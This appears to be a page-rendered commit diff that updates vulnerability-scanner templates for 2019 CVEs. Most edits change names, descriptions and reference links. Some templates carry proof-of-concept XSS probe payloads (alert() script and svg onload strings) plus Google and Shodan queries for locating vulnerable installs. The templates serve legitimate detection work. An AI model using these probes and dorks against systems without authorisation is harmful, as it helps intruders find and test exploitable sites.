||||
shodan-query: http.html:"SugarCRM Inc. All Rights Reserved"
|
||||
tags: sugarcrm,xss,edb,cve,cve2018
|
||||
|
||||
|
|
|
@ -16,7 +16,7 @@ info:
|
|||
cve-id: CVE-2019-1010287
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
google-dork: inurl:"/timesheet/login.php"
|
||||
google-query: inurl:"/timesheet/login.php"
|
||||
tags: cve,cve2019,timesheet,xss
|
||||
|
||||
requests:
|
||||
|
|
|
@ -7,8 +7,8 @@ info:
|
|||
description: Babel Multilingual site Babel All is affected by Open Redirection The impact is Redirection to any URL, which is supplied to redirect in a newurl parameter. The component is redirect The attack vector is The victim must open a link created by an attacker
|
||||
reference:
|
||||
- https://untrustednetwork.net/en/2019/02/20/open-redirection-vulnerability-in-babel/
|
||||
- https://www.cvedetails.com/cve/CVE-2019-1010290
|
||||
- http://dev.cmsmadesimple.org/project/files/729
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-1010290
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
|
|
@ -16,7 +16,7 @@ info:
|
|||
cve-id: CVE-2019-12593
|
||||
cwe-id: CWE-22
|
||||
metadata:
|
||||
google-dork: Powered By IceWarp 10.4.4
|
||||
google-query: Powered By IceWarp 10.4.4
|
||||
shodan-query: title:"icewarp"
|
||||
tags: cve,cve2019,lfi,icewarp
|
||||
|
||||
|
|
|
@ -4,9 +4,10 @@ info:
|
|||
name: SugarCRM Enterprise 9.0.0 - Cross-Site Scripting
|
||||
author: madrobot
|
||||
severity: medium
|
||||
description: SugarCRM Enterprise 9.0.0 allows mobile/error-not-supported-platform.html?desktop_url= XSS.
|
||||
description: SugarCRM Enterprise 9.0.0 contains a cross-site scripting vulnerability via mobile/error-not-supported-platform.html?desktop_url.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/47247
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-14974
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -27,3 +28,5 @@ requests:
|
|||
words:
|
||||
- "url = window.location.search.split(\"?desktop_url=\")[1]"
|
||||
part: body
|
||||
|
||||
# Enhanced by mp on 2022/08/31
|
||||
|
|
|
@ -1,14 +1,14 @@
|
|||
id: CVE-2019-15501
|
||||
|
||||
info:
|
||||
name: LSoft ListServ - XSS
|
||||
name: L-Soft LISTSERV <16.5-2018a - Cross-Site Scripting
|
||||
author: LogicalHunter
|
||||
severity: medium
|
||||
description: Reflected cross site scripting (XSS) in L-Soft LISTSERV before 16.5-2018a exists via the /scripts/wa.exe OK parameter.
|
||||
description: L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/47302
|
||||
- http://www.lsoft.com/manuals/16.5/LISTSERV16.5-2018a_WhatsNew.pdf
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15501
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-15501
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -36,3 +36,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/08/31
|
||||
|
|
|
@ -1,14 +1,15 @@
|
|||
id: CVE-2019-15811
|
||||
|
||||
info:
|
||||
name: DomainMOD 4.13.0 - Cross-Site Scripting
|
||||
name: DomainMOD <=4.13.0 - Cross-Site Scripting
|
||||
author: arafatansari
|
||||
severity: medium
|
||||
description: |
|
||||
DomainMOD 4.13.0 is vulnerable to Cross Site Scripting (XSS) via /reporting/domains/cost-by-month.php in Daterange parameters.
|
||||
DomainMOD through 4.13.0 contains a cross-site scripting vulnerability via /reporting/domains/cost-by-month.php in Daterange parameters.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/47325
|
||||
- https://github.com/domainmod/domainmod/issues/108
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-15811
|
||||
- https://zerodays.lol/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
|
@ -44,3 +45,5 @@ requests:
|
|||
- 'contains(body_2, "value=\"\"onfocus=\"alert(document.domain)\"autofocus=")'
|
||||
- 'contains(body_2, "DomainMOD")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/08/31
|
||||
|
|
|
@ -1,14 +1,14 @@
|
|||
id: CVE-2019-15889
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Download Manager 2.9.93 - Reflected Cross-Site Scripting (XSS)
|
||||
name: WordPress Download Manager <2.9.94 - Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: The download-manager plugin before 2.9.94 for WordPress has XSS via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter.
|
||||
description: WordPress Download Manager plugin before 2.9.94 contains a cross-site scripting vulnerability via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter.
|
||||
reference:
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889
|
||||
- https://www.cybersecurity-help.cz/vdb/SB2019041819
|
||||
- https://wordpress.org/plugins/download-manager/#developers
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-15889
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -36,3 +36,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/08/31
|
||||
|
|
|
@ -1,13 +1,14 @@
|
|||
id: CVE-2019-16332
|
||||
|
||||
info:
|
||||
name: API Bearer Auth <= 20181229 - Reflected Cross-Site Scripting (XSS)
|
||||
name: WordPress API Bearer Auth <20190907 - Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS.
|
||||
description: WordPress API Bearer Auth plugin before 20190907 contains a cross-site scripting vulnerability. The server parameter is not correctly filtered in swagger-config.yaml.php.
|
||||
reference:
|
||||
- https://plugins.trac.wordpress.org/changeset/2152730
|
||||
- https://wordpress.org/plugins/api-bearer-auth/#developers
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-16332
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -35,3 +36,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/08/31
|
||||
|
|
|
@ -1,15 +1,15 @@
|
|||
id: CVE-2019-16525
|
||||
|
||||
info:
|
||||
name: Wordpress Plugin Checklist <= 1.1.5 - Reflected Cross-Site Scripting (XSS)
|
||||
name: WordPress Checklist <1.1.9 - Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: An XSS issue was discovered in the checklist plugin before 1.1.9 for WordPress. The fill parameter is not correctly filtered in the checklist-icon.php file, and it is possible to inject JavaScript code.
|
||||
description: WordPress Checklist plugin before 1.1.9 contains a cross-site scripting vulnerability. The fill parameter is not correctly filtered in the checklist-icon.php file.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-16525
|
||||
- https://wordpress.org/plugins/checklist/#developers
|
||||
- https://packetstormsecurity.com/files/154436/WordPress-Checklist-1.1.5-Cross-Site-Scripting.html
|
||||
- https://plugins.trac.wordpress.org/changeset/2155029/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-16525
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -37,3 +37,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/08/31
|
||||
|
|
|
@ -1,16 +1,16 @@
|
|||
id: CVE-2019-16931
|
||||
|
||||
info:
|
||||
name: Visualizer < 3.3.1 - Stored Cross-Site Scripting (XSS)
|
||||
name: WordPress Visualizer <3.3.1 - Cross-Site Scripting
|
||||
author: ritikchaddha
|
||||
severity: medium
|
||||
description: |
|
||||
By abusing a lack of access controls on the /wp-json/visualizer/v1/update-chart WP-JSON API endpoint, an attacker can arbitrarily modify meta data of an existing chart, and inject a XSS payload to be stored and later executed when an admin goes to edit the chart.
|
||||
WordPress Visualizer plugin before 3.3.1 contains a stored cross-site scripting vulnerability via /wp-json/visualizer/v1/update-chart WP-JSON API endpoint. An unauthenticated attacker can execute arbitrary JavaScript when an admin or other privileged user edits the chart via the admin dashboard.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/867e000d-d2f5-4d53-89b0-41d7d4163f44
|
||||
- https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-16931
|
||||
- https://wpvulndb.com/vulnerabilities/9893
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-16931
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -44,3 +44,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/08/31
|
||||
|
|
|
@ -7,7 +7,7 @@ info:
|
|||
description: Zabbix through 4.4 is susceptible to an authentication bypass vulnerability via zabbix.php?action=dashboard.view&dashboardid=1. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/47467
|
||||
- https://www.cvedetails.com/cve/CVE-2019-17382/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-17382
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
|
||||
cvss-score: 9.1
|
||||
|
|
|
@ -9,7 +9,6 @@ info:
|
|||
reference:
|
||||
- https://atomic111.github.io/article/secudos-domos-directory_traversal
|
||||
- https://vuldb.com/?id.144804
|
||||
- https://www.cvedetails.com/cve/CVE-2019-18665
|
||||
- https://www.secudos.de/news-und-events/aktuelle-news/domos-release-5-6
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-18665
|
||||
classification:
|
||||
|
|
|
@ -1,15 +1,16 @@
|
|||
id: CVE-2019-19134
|
||||
|
||||
info:
|
||||
name: Hero Maps Premium < 2.2.3 - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
||||
name: WordPress Hero Maps Premium <=2.2.1 - Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: The Hero Maps Premium plugin 2.2.1 and prior for WordPress is prone to unauthenticated XSS via the views/dashboard/index.php p parameter because it fails to sufficiently sanitize user-supplied input - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
|
||||
description: WordPress Hero Maps Premium plugin 2.2.1 and prior contains an unauthenticated reflected cross-site scripting vulnerability via the views/dashboard/index.php p parameter.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/d179f7fe-e3e7-44b3-9bf8-aab2e90dbe01
|
||||
- https://www.hooperlabs.xyz/disclosures/cve-2019-19134.php
|
||||
- https://heroplugins.com/product/maps/
|
||||
- https://heroplugins.com/changelogs/hmaps/changelog.txt
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-19134
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -37,3 +38,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/08/31
|
||||
|
|
|
@ -1,14 +1,15 @@
|
|||
id: CVE-2019-19368
|
||||
|
||||
info:
|
||||
name: Rumpus FTP Web File Manager 8.2.9.1 XSS
|
||||
name: Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting
|
||||
author: madrobot
|
||||
severity: medium
|
||||
description: A Reflected Cross Site Scripting was discovered in the Login page of Rumpus FTP Web File Manager 8.2.9.1. An attacker can exploit it by sending a crafted link to end users and can execute arbitrary Javascripts
|
||||
description: Rumpus FTP Web File Manager 8.2.9.1 contains a reflected cross-site scripting vulnerability via the Login page. An attacker can send a crafted link to end users and can execute arbitrary JavaScript.
|
||||
reference:
|
||||
- https://github.com/harshit-shukla/CVE-2019-19368/
|
||||
- https://www.maxum.com/Rumpus/Download.html
|
||||
- http://packetstormsecurity.com/files/155719/Rumpus-FTP-Web-File-Manager-8.2.9.1-Cross-Site-Scripting.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-19368
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -29,3 +30,5 @@ requests:
|
|||
words:
|
||||
- "value=''><sVg/OnLoAD=alert`1337`//'>"
|
||||
part: body
|
||||
|
||||
# Enhanced by mp on 2022/08/31
|
||||
|
|
|
@ -1,14 +1,15 @@
|
|||
id: CVE-2019-19908
|
||||
|
||||
info:
|
||||
name: phpMyChat-Plus - Cross-Site Scripting
|
||||
name: phpMyChat-Plus 1.98 - Cross-Site Scripting
|
||||
author: madrobot
|
||||
severity: medium
|
||||
description: phpMyChat-Plus 1.98 is vulnerable to reflected cross-site scripting (XSS) via JavaScript injection into the password reset URL. In the URL, the pmc_username parameter to pass_reset.php is vulnerable.
|
||||
description: phpMyChat-Plus 1.98 contains a cross-site scripting vulnerability via pmc_username parameter of pass_reset.php in password reset URL.
|
||||
reference:
|
||||
- https://cinzinga.github.io/CVE-2019-19908/
|
||||
- http://ciprianmp.com/
|
||||
- https://sourceforge.net/projects/phpmychat/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-19908
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -29,3 +30,5 @@ requests:
|
|||
words:
|
||||
- "<script>alert(1337)</script>"
|
||||
part: body
|
||||
|
||||
# Enhanced by mp on 2022/08/31
|
||||
|
|
|
@ -1,14 +1,15 @@
|
|||
id: CVE-2019-20141
|
||||
|
||||
info:
|
||||
name: Neon Dashboard - Cross-Site Scripting
|
||||
name: WordPress Laborator Neon Theme 2.0 - Cross-Site Scripting
|
||||
author: knassar702
|
||||
severity: medium
|
||||
description: An XSS issue was discovered in the Laborator Neon theme 2.0 for WordPress via the data/autosuggest-remote.php q parameter.
|
||||
description: WordPress Laborator Neon theme 2.0 contains a cross-site scripting vulnerability via the data/autosuggest-remote.php q parameter.
|
||||
reference:
|
||||
- https://knassar7o2.blogspot.com/2019/12/neon-dashboard-cve-2019-20141.html
|
||||
- https://knassar7o2.blogspot.com/2019/12/neon-dashboard-xss-reflected.html
|
||||
- https://knassar702.github.io/cve/neon/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-20141
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -33,3 +34,5 @@ requests:
|
|||
words:
|
||||
- "text/html"
|
||||
part: header
|
||||
|
||||
# Enhanced by mp on 2022/08/31
|
||||
|
|
|
@ -15,7 +15,7 @@ info:
|
|||
cvss-score: 7.2
|
||||
cve-id: CVE-2019-20183
|
||||
cwe-id: CWE-434
|
||||
tags: upload,edb,cve,cve2019,rce,intrusive
|
||||
tags: edb,cve,cve2019,rce,intrusive,fileupload
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -1,16 +1,16 @@
|
|||
id: CVE-2019-20210
|
||||
|
||||
info:
|
||||
name: CTHthemes CityBook < 2.3.4 - Reflected XSS
|
||||
name: WordPress CTHthemes - Cross-Site Scripting
|
||||
author: edoardottt
|
||||
severity: medium
|
||||
description: |
|
||||
The CTHthemes CityBook before 2.3.4, TownHub before 1.0.6, and EasyBook before 1.2.2 themes for WordPress allow Reflected XSS via a search query.
|
||||
WordPress CTHthemes CityBook before 2.3.4, TownHub before 1.0.6, and EasyBook before 1.2.2 themes contain reflected cross-site scripting vulnerabilities via a search query.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/10013
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-20210
|
||||
- https://wpvulndb.com/vulnerabilities/10018
|
||||
- https://cxsecurity.com/issue/WLB-2019120112
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-20210
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -40,3 +40,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/08/31
|
||||
|
|
|
@ -1,13 +1,14 @@
|
|||
id: CVE-2019-3402
|
||||
|
||||
info:
|
||||
name: Jira - Reflected XSS using searchOwnerUserName parameter.
|
||||
name: Jira <8.1.1 - Cross-Site Scripting
|
||||
author: pdteam
|
||||
severity: medium
|
||||
description: The ConfigurePortalPages.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the searchOwnerUserName parameter.
|
||||
description: Jira before 8.1.1 contains a cross-site scripting vulnerability via ConfigurePortalPages.jspa resource in the searchOwnerUserName parameter.
|
||||
reference:
|
||||
- https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c
|
||||
- https://jira.atlassian.com/browse/JRASERVER-69243
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-3402
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -31,3 +32,5 @@ requests:
|
|||
words:
|
||||
- "<script>alert(1)</script>"
|
||||
part: body
|
||||
|
||||
# Enhanced by mp on 2022/08/31
|
||||
|
|
|
@ -1,14 +1,13 @@
|
|||
id: CVE-2019-3911
|
||||
|
||||
info:
|
||||
name: LabKey Server < 18.3.0 - XSS
|
||||
name: LabKey Server Community Edition <18.3.0 - Cross-Site Scripting
|
||||
author: princechaddha
|
||||
severity: medium
|
||||
description: Reflected cross-site scripting (XSS) vulnerability in LabKey Server Community Edition before 18.3.0-61806.763 allows an unauthenticated remote attacker to inject arbitrary javascript via the onerror
|
||||
parameter in the /__r2/query endpoints.
|
||||
description: LabKey Server Community Edition before 18.3.0-61806.763 contains a reflected cross-site scripting vulnerability via the onerror parameter in the /__r2/query endpoints, which allows an unauthenticated remote attacker to inject arbitrary JavaScript.
|
||||
reference:
|
||||
- https://www.tenable.com/security/research/tra-2019-03
|
||||
- https://www.cvedetails.com/cve/CVE-2019-3911
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-3911
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -38,3 +37,5 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by cs on 2022/09/07
|
||||
|
|
|
@ -1,14 +1,16 @@
|
|||
id: CVE-2019-7219
|
||||
|
||||
info:
|
||||
name: Zarafa WebApp Reflected XSS
|
||||
name: Zarafa WebApp <=2.0.1.47791 - Cross-Site Scripting
|
||||
author: pdteam
|
||||
severity: medium
|
||||
description: |
|
||||
Unauthenticated reflected cross-site scripting (XSS) exists in Zarafa Webapp 2.0.1.47791 and earlier. NOTE: this is a discontinued product. The issue was fixed in later Zarafa Webapp versions; however, some former Zarafa Webapp customers use the related Kopano product instead.
|
||||
Zarafa WebApp 2.0.1.47791 and earlier contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
|
||||
reference:
|
||||
- https://github.com/verifysecurity/CVE-2019-7219
|
||||
- https://stash.kopano.io/repos?visibility=public
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-7219
|
||||
remediation: This is a discontinued product. The issue was fixed in later versions. However, some former Zarafa WebApp customers use the related Kopano product instead.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
|
@ -20,7 +22,6 @@ requests:
|
|||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/webapp/?fccc%27\%22%3E%3Csvg/onload=alert(/xss/)%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
|
@ -31,7 +32,8 @@ requests:
|
|||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by cs on 2022/09/07
|
||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue